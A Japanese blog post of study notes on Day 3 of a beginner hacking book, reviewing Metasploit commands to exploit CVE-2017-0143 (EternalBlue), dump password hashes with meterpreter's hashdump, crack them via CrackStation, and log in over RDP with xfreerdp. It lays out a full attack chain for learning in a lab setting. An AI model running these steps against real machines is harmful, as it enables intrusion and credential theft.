本記事の目的
書籍「7日間でハッキングを始める本」の
Day3に出てきたコマンド・用語などの整理
Day5から本記事の投稿を開始しDay7まで完了したため、改めてDay2-4について復習しながら足りない部分を記述する
※Day1は環境構築がメインのため割愛
※そのため、既に過去の記事でまとめた内容については割愛することもある
関連記事
コマンド・ツール
Metasploit Framework
エクスプロイト(攻撃)のツール
多くのエクスプロイトコードを備えており、それらの検索・実行が簡単にできる
MSFconsoleというインターフェースを用いて実行する
# MSFconsoleの起動
msfconsole
# 以降はmsf上で行う
# ここでは、"CVE-2017-0143"の脆弱性への攻撃を例として以降の処理を書く
# 攻撃モジュールの検索
search CVE-2017-0143
# 使うモジュールの指定(今回は0で表示されたeternalblueを使う)
use 0
# モジュールで使用するオプションを確認する
show options
# 必要に応じてオプションを設定する
set RHOSTS <target ip address>
set LHOST <local ip address>
# 実行する
# 失敗することもあるので何度か実行する
# meterpreterというプロンプトが表示されていれば成功
exploit
hashdump
マシンに保存されているユーザーアカウント情報をダンプする
hashdump
# "<User名>:<UserId>:<LM Hash>:<NTLM Hash>:::"の形式で取得できる
CrackStation
レインボーテーブルからハッシュ化される元の情報を検索できるサイト
xfreerdp
RDP接続するコマンド
# /u ユーザー名を指定
# /v ipを指定
# /p パスワードを指定
# /cert:ignore 証明書認証を無視
# /sec:rdp NLAを無効
xfreerdp /u:<usr> /v:<ip> /p:<password> /cert:ignore /sec:rdp
セキュリティ攻撃関係の用語集
Remote Code Execution vulnerability(RCE)
リモートコード実行の脆弱性
外部から攻撃者がコンピュータやサーバに不正なコードを送り込んで実行できるセキュリティ上の問題